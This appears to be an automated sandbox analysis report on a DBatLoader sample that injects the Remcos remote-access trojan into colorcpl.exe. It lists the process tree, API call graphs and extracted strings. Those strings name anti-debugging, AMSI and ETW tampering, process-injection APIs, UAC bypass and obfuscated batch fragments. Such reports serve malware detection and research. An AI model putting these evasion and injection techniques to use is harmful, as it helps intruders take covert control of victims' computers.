                                      2024-12-17 18:47:04 UTC8192INData Raw: 39 43 35 6e 35 42 31 2b 70 67 38 4e 6a 33 2f 62 7a 37 32 55 6b 71 32 73 6d 75 47 61 58 47 41 57 73 56 59 33 56 4c 6c 49 54 2b 77 2f 78 71 4d 77 58 6b 5a 78 33 36 6e 76 33 71 69 36 54 39 6e 69 5a 69 6c 58 73 4f 45 77 51 41 39 58 31 4a 30 43 30 4e 50 35 4a 33 56 4e 79 2b 78 71 4e 4a 5a 4f 63 66 57 34 70 58 76 53 37 2b 4c 70 42 62 70 4c 31 6f 35 36 65 2b 4b 35 77 43 43 69 58 32 47 48 31 37 2b 73 61 35 4f 74 59 6e 4f 37 2f 53 36 66 32 46 30 63 5a 6f 31 4c 33 45 6a 4f 70 75 51 38 34 6e 6d 54 52 59 56 32 4d 61 64 38 52 72 57 61 71 42 44 45 54 53 68 49 35 56 49 56 32 57 53 50 76 71 35 65 6d 45 37 55 48 36 39 78 63 49 77 54 2f 6d 34 77 57 4d 42 43 6b 62 6f 55 55 55 79 53 37 72 4c 38 46 4b 55 69 57 6d 30 45 71 6e 48 61 52 6c 6e 68 36 61 6c 68 32 54 55 61 65 2b 73
                                      Data Ascii: 9C5n5B1+pg8Nj3/bz72Ukq2smuGaXGAWsVY3VLlIT+w/xqMwXkZx36nv3qi6T9niZilXsOEwQA9X1J0C0NP5J3VNy+xqNJZOcfW4pXvS7+LpBbpL1o56e+K5wCCiX2GH17+sa5OtYnO7/S6f2F0cZo1L3EjOpuQ84nmTRYV2Mad8RrWaqBDETShI5VIV2WSPvq5emE7UH69xcIwT/m4wWMBCkboUUUyS7rL8FKUiWm0EqnHaRlnh6alh2TUae+s


                                      Target ID:0
                                      Start time:13:46:59
                                      Start date:17/12/2024
                                      Path:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\MeP66xi1AM.exe"
                                      Imagebase:0x400000
                                      File size:952'320 bytes
                                      MD5 hash:F8CDBDF8318C11C2E3E286195F067042
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Yara matches:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2176891397.000000007EBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2115600641.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2193478070.0000000002317000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2113194413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2115096749.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:13:47:05
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:13:47:05
                                      Start date:17/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:13:47:05
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\colorcpl.exe
                                      Imagebase:0x420000
                                      File size:86'528 bytes
                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:7
                                      Start time:13:47:18
                                      Start date:17/12/2024
                                      Path:C:\Users\Public\Libraries\Wnbcdrjt.PIF
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\Public\Libraries\Wnbcdrjt.PIF"
                                      Imagebase:0x400000
                                      File size:952'320 bytes
                                      MD5 hash:F8CDBDF8318C11C2E3E286195F067042
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:Borland Delphi
                                      Yara matches:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:13:47:19
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:13:47:19
                                      Start date:17/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:13:47:19
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\colorcpl.exe
                                      Imagebase:0x420000
                                      File size:86'528 bytes
                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:15.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:19.1%
                                        Total number of Nodes:277
                                        Total number of Limit Nodes:14
                                        execution_graph 25063 2b567c4 25880 2b3480c 25063->25880 25881 2b3481d 25880->25881 25882 2b34843 25881->25882 25883 2b3485a 25881->25883 25889 2b34b78 25882->25889 25898 2b34570 25883->25898 25886 2b34850 25887 2b3488b 25886->25887 25903 2b34500 25886->25903 25890 2b34b85 25889->25890 25897 2b34bb5 25889->25897 25891 2b34bae 25890->25891 25894 2b34b91 25890->25894 25895 2b34570 11 API calls 25891->25895 25893 2b34b9f 25893->25886 25909 2b32c44 11 API calls 25894->25909 25895->25897 25910 2b344ac 25897->25910 25899 2b34574 25898->25899 25900 2b34598 25898->25900 25915 2b32c10 11 API calls 25899->25915 25900->25886 25902 2b34581 25902->25886 25904 2b34504 25903->25904 25905 2b34514 25903->25905 25904->25905 25907 2b34570 11 API calls 25904->25907 25906 2b34542 25905->25906 25916 2b32c2c 11 API calls 25905->25916 25906->25887 25907->25905 25909->25893 25911 2b344b2 25910->25911 25912 2b344cd 25910->25912 25911->25912 25914 2b32c2c 11 API calls 25911->25914 25912->25893 25914->25912 25915->25902 25916->25906 25917 2b5bb44 25920 2b4ec74 25917->25920 25921 2b4ec7c 25920->25921 25921->25921 28904 2b4870c LoadLibraryW 25921->28904 25923 2b4ec9e 28909 2b32ee0 QueryPerformanceCounter 25923->28909 25925 2b4eca3 25926 2b4ecad InetIsOffline 25925->25926 25927 2b4ecb7 25926->25927 25928 2b4ecc8 25926->25928 25929 2b34500 11 API calls 25927->25929 25930 2b34500 11 API calls 25928->25930 25931 2b4ecc6 25929->25931 25930->25931 25932 2b3480c 11 API calls 25931->25932 25933 2b4ecf5 25932->25933 25934 2b4ecfd 25933->25934 28912 2b34798 25934->28912 25936 2b4ed20 25937 2b4ed28 25936->25937 25938 2b4ed32 25937->25938 28927 2b48824 25938->28927 25941 2b3480c 11 API calls 25942 2b4ed59 25941->25942 25943 2b4ed61 25942->25943 25944 2b34798 11 API calls 25943->25944 25945 2b4ed84 25944->25945 25946 2b4ed8c 25945->25946 28940 2b346a4 25946->28940 28942 2b480c8 28904->28942 28906 2b48745 28953 2b47d00 28906->28953 28910 2b32ef8 GetTickCount 
28909->28910 28911 2b32eed 28909->28911 28910->25925 28911->25925 28913 2b347fd 28912->28913 28914 2b3479c 28912->28914 28915 2b34500 28914->28915 28916 2b347a4 28914->28916 28920 2b34570 11 API calls 28915->28920 28922 2b34514 28915->28922 28916->28913 28917 2b347b3 28916->28917 28919 2b34500 11 API calls 28916->28919 28921 2b34570 11 API calls 28917->28921 28918 2b34542 28918->25936 28919->28917 28920->28922 28924 2b347cd 28921->28924 28922->28918 28990 2b32c2c 11 API calls 28922->28990 28925 2b34500 11 API calls 28924->28925 28926 2b347f9 28925->28926 28926->25936 28928 2b48838 28927->28928 28929 2b48857 LoadLibraryA 28928->28929 28930 2b48867 28929->28930 28931 2b48020 17 API calls 28930->28931 28932 2b4886d 28931->28932 28933 2b480c8 15 API calls 28932->28933 28934 2b48886 28933->28934 28935 2b47d00 18 API calls 28934->28935 28936 2b488e5 FreeLibrary 28935->28936 28937 2b488fd 28936->28937 28938 2b344d0 11 API calls 28937->28938 28939 2b4890a 28938->28939 28939->25941 28941 2b346aa 28940->28941 28943 2b34500 11 API calls 28942->28943 28944 2b480ed 28943->28944 28967 2b47914 28944->28967 28947 2b34798 11 API calls 28948 2b48107 28947->28948 28949 2b4810f GetModuleHandleW GetProcAddress GetProcAddress 28948->28949 28950 2b48142 28949->28950 28973 2b344d0 28950->28973 28954 2b34500 11 API calls 28953->28954 28955 2b47d25 28954->28955 28956 2b47914 12 API calls 28955->28956 28957 2b47d32 28956->28957 28958 2b34798 11 API calls 28957->28958 28959 2b47d42 28958->28959 28979 2b48020 28959->28979 28962 2b480c8 15 API calls 28963 2b47d5b NtWriteVirtualMemory 28962->28963 28964 2b47d87 28963->28964 28965 2b344d0 11 API calls 28964->28965 28966 2b47d94 FreeLibrary 28965->28966 28966->25923 28968 2b47925 28967->28968 28969 2b34b78 11 API calls 28968->28969 28971 2b47935 28969->28971 28970 2b479a1 28970->28947 28971->28970 28977 2b3ba44 CharNextA 28971->28977 28975 2b344d6 28973->28975 28974 2b344fc 28974->28906 28975->28974 28978 2b32c2c 11 API calls 28975->28978 
28977->28971 28978->28975 28980 2b34500 11 API calls 28979->28980 28981 2b48043 28980->28981 28982 2b47914 12 API calls 28981->28982 28983 2b48050 28982->28983 28984 2b48058 GetModuleHandleA 28983->28984 28985 2b480c8 15 API calls 28984->28985 28986 2b48069 GetModuleHandleA 28985->28986 28987 2b48087 28986->28987 28988 2b344ac 11 API calls 28987->28988 28989 2b47d55 28988->28989 28989->28962 28990->28918 28991 2b5c2fc 29001 2b36518 28991->29001 28995 2b5c32a 29006 2b5bb50 timeSetEvent 28995->29006 28997 2b5c334 28998 2b5c342 GetMessageA 28997->28998 28999 2b5c336 TranslateMessage DispatchMessageA 28998->28999 29000 2b5c352 28998->29000 28999->28998 29002 2b36523 29001->29002 29007 2b34168 29002->29007 29005 2b3427c SysAllocStringLen SysFreeString SysReAllocStringLen 29005->28995 29006->28997 29008 2b341ae 29007->29008 29009 2b34227 29008->29009 29010 2b343b8 29008->29010 29021 2b34100 29009->29021 29013 2b343e9 29010->29013 29016 2b343fa 29010->29016 29026 2b3432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 29013->29026 29015 2b343f3 29015->29016 29017 2b3443f FreeLibrary 29016->29017 29018 2b34463 29016->29018 29017->29016 29019 2b34472 ExitProcess 29018->29019 29020 2b3446c 29018->29020 29020->29019 29022 2b34143 29021->29022 29023 2b34110 29021->29023 29022->29005 29023->29022 29027 2b35814 29023->29027 29031 2b315cc 29023->29031 29026->29015 29028 2b35824 GetModuleFileNameA 29027->29028 29029 2b35840 29027->29029 29035 2b35a78 GetModuleFileNameA RegOpenKeyExA 29028->29035 29029->29023 29054 2b31560 29031->29054 29033 2b315d4 VirtualAlloc 29034 2b315eb 29033->29034 29034->29023 29036 2b35afb 29035->29036 29037 2b35abb RegOpenKeyExA 29035->29037 29053 2b358b4 12 API calls 29036->29053 29037->29036 29038 2b35ad9 RegOpenKeyExA 29037->29038 29038->29036 29040 2b35b84 lstrcpynA GetThreadLocale GetLocaleInfoA 29038->29040 29042 2b35bbb 29040->29042 29043 2b35c9e 29040->29043 29041 2b35b20 RegQueryValueExA 29044 2b35b5e RegCloseKey 29041->29044 29045 
2b35b40 RegQueryValueExA 29041->29045 29042->29043 29047 2b35bcb lstrlenA 29042->29047 29043->29029 29044->29029 29045->29044 29048 2b35be3 29047->29048 29048->29043 29049 2b35c30 29048->29049 29050 2b35c08 lstrcpynA LoadLibraryExA 29048->29050 29049->29043 29051 2b35c3a lstrcpynA LoadLibraryExA 29049->29051 29050->29049 29051->29043 29052 2b35c6c lstrcpynA LoadLibraryExA 29051->29052 29052->29043 29053->29041 29055 2b31500 29054->29055 29055->29033 29056 2b34e88 29057 2b34e95 29056->29057 29060 2b34e9c 29056->29060 29065 2b34bdc SysAllocStringLen 29057->29065 29062 2b34bfc 29060->29062 29063 2b34c02 SysFreeString 29062->29063 29064 2b34c08 29062->29064 29063->29064 29065->29060 29066 2b31c6c 29067 2b31d04 29066->29067 29068 2b31c7c 29066->29068 29069 2b31f58 29067->29069 29070 2b31d0d 29067->29070 29071 2b31cc0 29068->29071 29072 2b31c89 29068->29072 29076 2b31fec 29069->29076 29080 2b31f68 29069->29080 29081 2b31fac 29069->29081 29073 2b31d25 29070->29073 29088 2b31e24 29070->29088 29074 2b31724 10 API calls 29071->29074 29075 2b31c94 29072->29075 29114 2b31724 29072->29114 29078 2b31d2c 29073->29078 29084 2b31d48 29073->29084 29089 2b31dfc 29073->29089 29098 2b31cd7 29074->29098 29077 2b31e7c 29083 2b31724 10 API calls 29077->29083 29100 2b31e95 29077->29100 29082 2b31724 10 API calls 29080->29082 29086 2b31fb2 29081->29086 29090 2b31724 10 API calls 29081->29090 29099 2b31f82 29082->29099 29102 2b31f2c 29083->29102 29093 2b31d79 Sleep 29084->29093 29106 2b31d9c 29084->29106 29085 2b31cfd 29087 2b31cb9 29088->29077 29092 2b31e55 Sleep 29088->29092 29088->29100 29094 2b31724 10 API calls 29089->29094 29105 2b31fc1 29090->29105 29091 2b31fa7 29092->29077 29095 2b31e6f Sleep 29092->29095 29096 2b31d91 Sleep 29093->29096 29093->29106 29109 2b31e05 29094->29109 29095->29088 29096->29084 29097 2b31ca1 29097->29087 29138 2b31a8c 29097->29138 29098->29085 29104 2b31a8c 8 API calls 29098->29104 29099->29091 29107 2b31a8c 8 API calls 29099->29107 29102->29100 29108 
2b31a8c 8 API calls 29102->29108 29103 2b31e1d 29104->29085 29105->29091 29110 2b31a8c 8 API calls 29105->29110 29107->29091 29111 2b31f50 29108->29111 29109->29103 29112 2b31a8c 8 API calls 29109->29112 29113 2b31fe4 29110->29113 29112->29103 29115 2b31968 29114->29115 29116 2b3173c 29114->29116 29117 2b31938 29115->29117 29118 2b31a80 29115->29118 29126 2b317cb Sleep 29116->29126 29128 2b3174e 29116->29128 29122 2b31947 Sleep 29117->29122 29131 2b31986 29117->29131 29120 2b31684 VirtualAlloc 29118->29120 29121 2b31a89 29118->29121 29119 2b3175d 29119->29097 29123 2b316bf 29120->29123 29124 2b316af 29120->29124 29121->29097 29125 2b3195d Sleep 29122->29125 29122->29131 29123->29097 29155 2b31644 29124->29155 29125->29117 29126->29128 29130 2b317e4 Sleep 29126->29130 29128->29119 29129 2b3182c 29128->29129 29132 2b3180a Sleep 29128->29132 29136 2b315cc VirtualAlloc 29129->29136 29137 2b31838 29129->29137 29130->29116 29133 2b315cc VirtualAlloc 29131->29133 29135 2b319a4 29131->29135 29132->29129 29134 2b31820 Sleep 29132->29134 29133->29135 29134->29128 29135->29097 29136->29137 29137->29097 29139 2b31aa1 29138->29139 29140 2b31b6c 29138->29140 29142 2b31aa7 29139->29142 29143 2b31b13 Sleep 29139->29143 29141 2b316e8 29140->29141 29140->29142 29145 2b31c66 29141->29145 29148 2b31644 2 API calls 29141->29148 29144 2b31ab0 29142->29144 29147 2b31b4b Sleep 29142->29147 29152 2b31b81 29142->29152 29143->29142 29146 2b31b2d Sleep 29143->29146 29144->29087 29145->29087 29146->29139 29150 2b31b61 Sleep 29147->29150 29147->29152 29149 2b316f5 VirtualFree 29148->29149 29151 2b3170d 29149->29151 29150->29142 29151->29087 29153 2b31c00 VirtualFree 29152->29153 29154 2b31ba4 29152->29154 29153->29087 29154->29087 29156 2b31681 29155->29156 29157 2b3164d 29155->29157 29156->29123 29157->29156 29158 2b3164f Sleep 29157->29158 29159 2b31664 29158->29159 29159->29156 29160 2b31668 Sleep 29159->29160 29160->29157
                                        APIs
                                        • InetIsOffline.URL(00000000,00000000,02B5AFA1,?,?,?,000002F7,00000000,00000000), ref: 02B4ECAE
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                          • Part of subcall function 02B4EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02B4EF98,UacInitialize,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,Initialize), ref: 02B4EB9A
                                          • Part of subcall function 02B4EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B4EBAC
                                          • Part of subcall function 02B4EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B4EC00
                                          • Part of subcall function 02B4EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B4EC12
                                          • Part of subcall function 02B4EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B4EC29
                                          • Part of subcall function 02B37E18: GetFileAttributesA.KERNEL32(00000000,?,02B4F8CC,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,UacInitialize), ref: 02B37E23
                                          • Part of subcall function 02B3C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C858C8,?,02B4FBFE,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession), ref: 02B3C303
                                          • Part of subcall function 02B4DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DBEB
                                          • Part of subcall function 02B4DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DC1B
                                          • Part of subcall function 02B4DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B4DC30
                                          • Part of subcall function 02B4DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B4DC5C
                                          • Part of subcall function 02B4DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B4DC65
                                          • Part of subcall function 02B37E3C: GetFileAttributesA.KERNEL32(00000000,?,02B52A49,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,Initialize), ref: 02B37E47
                                          • Part of subcall function 02B37FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B52BE7,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,Initialize,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8), ref: 02B37FDD
                                          • Part of subcall function 02B4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DB9E), ref: 02B4DB0B
                                          • Part of subcall function 02B4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B4DB45
                                          • Part of subcall function 02B4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B4DB72
                                          • Part of subcall function 02B4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B4DB7B
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                          • Part of subcall function 02B4870C: LoadLibraryW.KERNEL32(amsi), ref: 02B48715
                                          • Part of subcall function 02B4870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B48774
                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,02B5B330), ref: 02B549B7
                                          • Part of subcall function 02B4DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02B4DA6C
                                          • Part of subcall function 02B4DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DABE), ref: 02B4DA82
                                          • Part of subcall function 02B4DA44: NtDeleteFile.NTDLL(?), ref: 02B4DAA1
                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02B54BB7
                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02B54C0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                        • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                        • API String ID: 3130226682-181751239
                                        • Opcode ID: 208c4a169fc6fe753851fb13f6207168ab9b448439ddd58962ce52fae9fbb353
                                        • Instruction ID: 70e54c992bc1c2e039e51162d6ce63f720a29f86221e9e58023364c7ba5c569f
                                        • Opcode Fuzzy Hash: 208c4a169fc6fe753851fb13f6207168ab9b448439ddd58962ce52fae9fbb353
                                        • Instruction Fuzzy Hash: 01242BB6A501688FDB12EB64DC80ADE73B6FF89310F1045E6E409EB254DA70EE85CF51

                                        Control-flow Graph (function starting at 02B4AF58; graph rendering not reproduced)
                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
